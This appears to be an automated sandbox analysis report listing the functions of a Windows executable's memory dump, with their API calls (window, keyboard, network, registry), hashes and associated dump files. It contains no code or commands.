Instruction Fuzzy Hash: 28918971A00219AFDB21DFA5DC49FAFBBB8EF85310F108559F519AB280D7B09945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 009FAEE3, Relevance: 10.8, APIs: 7, Instructions: 259COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(009E70B8,?,?,7FFFFFFF,00000000,?,009FB1B6,?,?,?,?,?,?,?,009E70B8,00000000), ref: 009FAF92
MultiByteToWideChar.KERNEL32(009E70B8,00000009,?,?,00000000,00000000,?,009FB1B6,?,?,?,?,?,?,?,009E70B8), ref: 009FB00C
MultiByteToWideChar.KERNEL32(009E70B8,00000001,?,?,00000000,00000000,?,009FB1B6,?,?,?,?,?,?,?,009E70B8), ref: 009FB087
MultiByteToWideChar.KERNEL32(009E70B8,00000009,009E70B8,?,00000000,00000000,?,009FB1B6,?,?,?,?,?,?,?,009E70B8), ref: 009FB0A0

Part of subcall function 009E594C: __FF_MSGBANNER.LIBCMT ref: 009E5963
Part of subcall function 009E594C: RtlAllocateHeap.NTDLL(013A0000,00000000,?,00000000,?,?,?,009E1013,?), ref: 009E598F

MultiByteToWideChar.KERNEL32(009E70B8,00000001,009E70B8,?,00000000,00000000,?,009FB1B6,?,?,?,?,?,?,?,009E70B8), ref: 009FB11D
__freea.LIBCMT ref: 009FB143
__freea.LIBCMT ref: 009FB14A

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 9e30d9d5fd220c607a779c138d9db9dd670f50ab47710e722cbafc3071db86bb
Instruction ID: e35b0fbb0d05decf9e24f6de14d87068e9f216bb5969b9a0928ebe4d43ce137a
Opcode Fuzzy Hash: 9e30d9d5fd220c607a779c138d9db9dd670f50ab47710e722cbafc3071db86bb
Instruction Fuzzy Hash: 4181E2F2A0411DAFDF20DF98D891AFFBBB9EF49360B240119EA18EB241D7259C058761

Uniqueness

Uniqueness Score: -1.00%

Function 009C1424, Relevance: 10.7, APIs: 7, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83bc5f6b55995cb3a134894b3b3654c6970c39a63426598c304edd887dd02a9d
Instruction ID: a06de970f95382ebc9856c2a77c23d4df502a0de1c41a90eee482eb08917d3f2
Opcode Fuzzy Hash: 83bc5f6b55995cb3a134894b3b3654c6970c39a63426598c304edd887dd02a9d
Instruction Fuzzy Hash: CE816A34D00109EFCB04CF98CC89EBEBB79FF86314F108149F515AA252C734AA51CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 009FAB1B, Relevance: 10.7, APIs: 7, Instructions: 217COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 009FAC19
_strlen.LIBCMT ref: 009FACC3
_strlen.LIBCMT ref: 009FACDC
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000,00A7C050,00000008,009E70B8), ref: 009FAD0A
_free.LIBCMT ref: 009FAD24
_free.LIBCMT ref: 009FAD31
_free.LIBCMT ref: 009FAD43

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$_strlen$EnvironmentVariable
String ID:
API String ID: 3205821093-0
Opcode ID: ecf789f16fc80f3f74f5c0afaef5282189572b30a1d9cf4d6558497444ab62ba
Instruction ID: 748cb2be5eccccc060792ff57ab7c4e1c119d651dbb89d655889c699d6eebc82
Opcode Fuzzy Hash: ecf789f16fc80f3f74f5c0afaef5282189572b30a1d9cf4d6558497444ab62ba
Instruction Fuzzy Hash: 8D6158F2500209AFDB119FA4EC42B7A7BACEF51776F104625E60CA71D1DB359C81C762

Uniqueness

Uniqueness Score: -1.00%

Function 00A4B60B, Relevance: 10.7, APIs: 7, Instructions: 200windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(013B9698), ref: 00A4B6A5
IsWindowEnabled.USER32(013B9698), ref: 00A4B6B1
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00A4B795
SendMessageW.USER32(013B9698,000000B0,?,?), ref: 00A4B7CC
IsDlgButtonChecked.USER32(?,?), ref: 00A4B809
GetWindowLongW.USER32 ref: 00A4B82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00A4B843

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: dc601d1b2991dd666d231a732a64e9f07f6a6edcb2b801723a26437c4d1bb6af
Instruction ID: 426bb78c75de583f80d422b1a2542aad6f587f69b48699674674d24a27357ce7
Opcode Fuzzy Hash: dc601d1b2991dd666d231a732a64e9f07f6a6edcb2b801723a26437c4d1bb6af
Instruction Fuzzy Hash: E0719F3C611204AFEB24DFA4C894FAABBB9FFCA340F154069F94597261C732E941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A21276, Relevance: 10.7, APIs: 7, Instructions: 173windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00A212B5
GetKeyboardState.USER32(?,?,?,?), ref: 00A212CA
SetKeyboardState.USER32(?,?,?,?), ref: 00A2132B
PostMessageW.USER32 ref: 00A21357
PostMessageW.USER32 ref: 00A21374
PostMessageW.USER32 ref: 00A213B8
PostMessageW.USER32 ref: 00A213D9

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 6e869382f48f171593c870a2b9e128973c459af2a64d5bff9e60ddf7852d8000
Instruction ID: 04c1ceb901b62a541a7d440958515d156142353ce0f6c0b04c697fd3e09f355a
Opcode Fuzzy Hash: 6e869382f48f171593c870a2b9e128973c459af2a64d5bff9e60ddf7852d8000
Instruction Fuzzy Hash: 6B51E6A15047E57DFB368338AC05BB67FA99B17300F0849A9F1D899CC2D3A5E898D760

Uniqueness

Uniqueness Score: -1.00%

Function 00A2145D, Relevance: 10.7, APIs: 7, Instructions: 173windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00A2149C
GetKeyboardState.USER32(?), ref: 00A214B1
SetKeyboardState.USER32(?), ref: 00A21512
PostMessageW.USER32 ref: 00A21540
PostMessageW.USER32 ref: 00A2155F
PostMessageW.USER32 ref: 00A215A5
PostMessageW.USER32 ref: 00A215C8

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 041b7043d493099d4604bf8c2e72193a78de3d51de9caeabc9549a2797604074
Instruction ID: a2cf21b3ce39f15677f6173473fc4bc0f5e41ed1e9be3ade5db07a697e1bb9ed
Opcode Fuzzy Hash: 041b7043d493099d4604bf8c2e72193a78de3d51de9caeabc9549a2797604074
Instruction Fuzzy Hash: C05106A06047E53DFB36473CEC05BB67FA89B56304F0849A9F1D5958D2D3A9D8C4C760

Uniqueness

Uniqueness Score: -1.00%

Function 00A31D09, Relevance: 10.6, APIs: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A31D44
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A31D70
InternetQueryOptionW.WININET(00000000,0000001F,00000000,00000003), ref: 00A31DB2
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A31DC7
HttpSendRequestW.WININET(00000000,00000003,00000003,00000003,00000003), ref: 00A31DD4
HttpQueryInfoW.WININET(00000000,00000005,?,00000003,00000000), ref: 00A31E04
InternetCloseHandle.WININET(00000000), ref: 00A31E4B

Part of subcall function 00A32777: GetLastError.KERNEL32(?,?,00A31B0B,00000000,00000000,00000001), ref: 00A3278C
Part of subcall function 00A32777: SetEvent.KERNEL32(?,?,00A31B0B,00000000,00000000,00000001), ref: 00A327A1

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-0
Opcode ID: fba49908936d59b0a0a97e678c3fec1c0f3a153211e9e1248af271f8c53a22d1
Instruction ID: 4f8cfa3ced47a94aed26d2af4db201e7ef609b14a6165b98c1ff1eb1c90755a2
Opcode Fuzzy Hash: fba49908936d59b0a0a97e678c3fec1c0f3a153211e9e1248af271f8c53a22d1
Instruction Fuzzy Hash: F54181B5500208BFEB129FA0CC89FFB7BACFF45754F10412AF9059A141D7769E458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A4122D, Relevance: 10.6, APIs: 7, Instructions: 106registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32 ref: 00A4125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A41286
FreeLibrary.KERNEL32(00000000), ref: 00A4133D

Part of subcall function 00A4122D: RegCloseKey.ADVAPI32(?), ref: 00A412A3
Part of subcall function 00A4122D: FreeLibrary.KERNEL32(?), ref: 00A412F5
Part of subcall function 00A4122D: RegEnumKeyExW.ADVAPI32 ref: 00A41318

RegDeleteKeyW.ADVAPI32(?,?), ref: 00A412E0

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: ddc8e9028adb8444f0f0683a8ffc171eb6a67ca45199693e6315feaf17a2de39
Instruction ID: b16bf877719a29ab61ac857cadbc80820004326ada6d406c29406c2b8bc830d0
Opcode Fuzzy Hash: ddc8e9028adb8444f0f0683a8ffc171eb6a67ca45199693e6315feaf17a2de39
Instruction Fuzzy Hash: A5316DB9901119BEEB14DFD0DD89EFFBBBCEB89340F00016AF511E2140E7756E859AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A473C1, Relevance: 10.6, APIs: 7, Instructions: 106windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00A473F4
SetMenu.USER32(?,00000000), ref: 00A47403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A47490
IsMenu.USER32(?), ref: 00A474A6
CreatePopupMenu.USER32 ref: 00A474B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A474DD
DrawMenuBar.USER32 ref: 00A474E5

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID:
API String ID: 161812096-0
Opcode ID: 3477c9a61bd0c021cb25ab7e1043963e51feef41514f405f6816652fb01bd261
Instruction ID: 6cc40f68eaa51d871688f0e6a68c577adbfe97f29003f28998e2d7659437a344
Opcode Fuzzy Hash: 3477c9a61bd0c021cb25ab7e1043963e51feef41514f405f6816652fb01bd261
Instruction Fuzzy Hash: A4416A79A00249EFDB10DFA4D884EAABBF5FF8A350F144029F955A7360D731A910CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A4653C, Relevance: 10.6, APIs: 7, Instructions: 102windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00A4655B
GetWindowLongW.USER32 ref: 00A4658E
GetWindowLongW.USER32 ref: 00A465C3
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00A465F5
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00A4661F
GetWindowLongW.USER32 ref: 00A46630
SetWindowLongW.USER32 ref: 00A4664A

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 7c0f7628809a0f658133050037c5cdf49b0e367089078924159d524158d60f33
Instruction ID: 02e7221fdff838dc5e8453ab41c9831733197f85d107fbfd57521c515d396315
Opcode Fuzzy Hash: 7c0f7628809a0f658133050037c5cdf49b0e367089078924159d524158d60f33
Instruction Fuzzy Hash: BF313439604150AFEB20CFA8EC85F557BE1FB8B364F1601A8F505CB2B5CB72A841CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A36486, Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A380A0: inet_addr.WSOCK32(?,?,?,?,?,?,00000000), ref: 00A380CB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A364D9
WSAGetLastError.WSOCK32(00000000), ref: 00A364E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00A36521
connect.WSOCK32(00000000,?,00000010), ref: 00A3652A
WSAGetLastError.WSOCK32 ref: 00A36534
closesocket.WSOCK32(00000000), ref: 00A3655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00A36576

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 927c8aa47446b48c446bbf9f1b877a5415b4254b78e883256d7682eef698415e
Instruction ID: dce3b0914463ac337bcbb4e44bb3f59ec1c0b0667c20242fcb2e164b150e32f3
Opcode Fuzzy Hash: 927c8aa47446b48c446bbf9f1b877a5415b4254b78e883256d7682eef698415e
Instruction Fuzzy Hash: 7531B335600218AFDB10DF64DD85FBE7BB8EB85714F048029F9099B291DB75AD05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A1E0B5, Relevance: 10.6, APIs: 7, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,000000FF), ref: 00A1E0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,000000FF), ref: 00A1E120
SysAllocString.OLEAUT32(00000000), ref: 00A1E123
SysAllocString.OLEAUT32 ref: 00A1E144
SysFreeString.OLEAUT32 ref: 00A1E14D
StringFromGUID2.OLE32(?,?,00000028), ref: 00A1E167
SysAllocString.OLEAUT32(?), ref: 00A1E175

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 3f573a5960bfb0e27e55b17938886a6e693e553b0ede38abe79bda19491302f1
Instruction ID: 2325cfa15def00cc8d44e5375408993fa4202554949f0e1e2fe4bd497d7e7846
Opcode Fuzzy Hash: 3f573a5960bfb0e27e55b17938886a6e693e553b0ede38abe79bda19491302f1
Instruction Fuzzy Hash: 4E21A17A600108BF9B10EFA8DC89CAB77ECEB59760B508225F955CB1A0DA719C81CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009E3469, Relevance: 10.6, APIs: 7, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 009E9E4B: EnterCriticalSection.KERNEL32(?,?,009E9CBC,0000000D), ref: 009E9E76

DecodePointer.KERNEL32(00A7BB70,0000001C,009E33C2,00000000,00000001,00000000,?,009E3310,000000FF,?,009E9E6E,00000011,?,?,009E9CBC,0000000D), ref: 009E34B6
DecodePointer.KERNEL32(?,009E3310,000000FF,?,009E9E6E,00000011,?,?,009E9CBC,0000000D), ref: 009E34C7
EncodePointer.KERNEL32(00000000,?,009E3310,000000FF,?,009E9E6E,00000011,?,?,009E9CBC,0000000D), ref: 009E34E0
DecodePointer.KERNEL32(-00000004,?,009E3310,000000FF,?,009E9E6E,00000011,?,?,009E9CBC,0000000D), ref: 009E34F0
EncodePointer.KERNEL32(00000000,?,009E3310,000000FF,?,009E9E6E,00000011,?,?,009E9CBC,0000000D), ref: 009E34F6
DecodePointer.KERNEL32(?,009E3310,000000FF,?,009E9E6E,00000011,?,?,009E9CBC,0000000D), ref: 009E350C
DecodePointer.KERNEL32(?,009E3310,000000FF,?,009E9E6E,00000011,?,?,009E9CBC,0000000D), ref: 009E3517

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Pointer$Decode$Encode$CriticalEnterSection
String ID:
API String ID: 3368343417-0
Opcode ID: fe2047667257ba3a35de0e4397be830246839cec3ef84d876c80ae29f3893a38
Instruction ID: 714545b388ce4097138824b4a7441863a2c1c0a7f568a81b53c451d3c06976a6
Opcode Fuzzy Hash: fe2047667257ba3a35de0e4397be830246839cec3ef84d876c80ae29f3893a38
Instruction Fuzzy Hash: A6318274D04385AEEF12DFA5EC4979D7BB4BB88310F10956AE414A7291EFB51E41CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00A4783C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009C1D35: CreateWindowExW.USER32 ref: 009C1D73
Part of subcall function 009C1D35: GetStockObject.GDI32(00000011), ref: 009C1D87
Part of subcall function 009C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 009C1D91

SendMessageW.USER32(00000000,00002001,?,FF000000), ref: 00A478A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A478AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A478B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A478C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A478D4

Strings

Msctls_Progress32, xrefs: 00A47872

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 1248a116791ffcee9a205e78884bd6883b4c556215adcf8d3d3f43877ee3641c
Instruction ID: 354de2a8d84f732a172ed4269edd99131696044e4c40ec853838a10b7ceb1cda
Opcode Fuzzy Hash: 1248a116791ffcee9a205e78884bd6883b4c556215adcf8d3d3f43877ee3641c
Instruction Fuzzy Hash: B811B2B6510119BEEF149F60CC85EEB7F6DEF48798F014115FA08A6090C7729C61DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00A24534, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100), ref: 00A2454E
LoadStringW.USER32(00000000), ref: 00A24555
GetModuleHandleW.KERNEL32(00000100,00001389,?,00000100), ref: 00A2456B
LoadStringW.USER32(00000000), ref: 00A24572
MessageBoxW.USER32(00000100,?,?,00011010), ref: 00A245B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00A24593

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 65f970bf3cd625a09d709422302b093af6693b8c88aa45bd68fe27ad12554ea2
Instruction ID: 86c62261b0399e50153a4a446bafe7910191223a1d431124870319a4c41ce9b9
Opcode Fuzzy Hash: 65f970bf3cd625a09d709422302b093af6693b8c88aa45bd68fe27ad12554ea2
Instruction Fuzzy Hash: C8017CFA500218BFE711D7E4DD89EFB772CD749301F0005A6B749E2011DA325E868B30

Uniqueness

Uniqueness Score: -1.00%

Function 009E41C9, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,009E4292,?), ref: 009E41E3
GetProcAddress.KERNEL32(00000000), ref: 009E41EA
EncodePointer.KERNEL32(00000000), ref: 009E41F6
DecodePointer.KERNEL32(00000001,009E4292,?), ref: 009E4213

Strings

combase.dll, xrefs: 009E41DE
RoInitialize, xrefs: 009E41D2

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: cba975008dfc2d7774bf8bdd90d389ea8edeffaa07fb98ee3725e3a4751c357b
Instruction ID: ffe790fc54b3b9140939f6ac1786ef2910a0f5fd8d24672c6709242279a992e5
Opcode Fuzzy Hash: cba975008dfc2d7774bf8bdd90d389ea8edeffaa07fb98ee3725e3a4751c357b
Instruction Fuzzy Hash: EBE01AB8590741AFEB20DFF1EC0DB043AA4B7AA743F505920B921D90A0DBB614978F00

Uniqueness

Uniqueness Score: -1.00%

Function 009E429E, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009E41B8), ref: 009E42B8
GetProcAddress.KERNEL32(00000000), ref: 009E42BF
EncodePointer.KERNEL32(00000000), ref: 009E42CA
DecodePointer.KERNEL32(009E41B8), ref: 009E42E5

Strings

RoUninitialize, xrefs: 009E42A7
combase.dll, xrefs: 009E42B3

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 9a5bf2b9c462d4fb8d03706ca62e729f437654de385e073988956fa9b43192fa
Instruction ID: 25ec0bad0b6e4634cd7ab08a9e89c6c59fc146e93903bc09bcbd63f8c6145cde
Opcode Fuzzy Hash: 9a5bf2b9c462d4fb8d03706ca62e729f437654de385e073988956fa9b43192fa
Instruction Fuzzy Hash: 51E08C7C580302EFEB10EFE0EC0CB003AB8B76AB42F102624F520E51A0CBB24886CB04

Uniqueness

Uniqueness Score: -1.00%

Function 009C1DB3, Relevance: 9.3, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 009C1DDC
GetWindowRect.USER32 ref: 009C1E1D
ScreenToClient.USER32 ref: 009C1E45
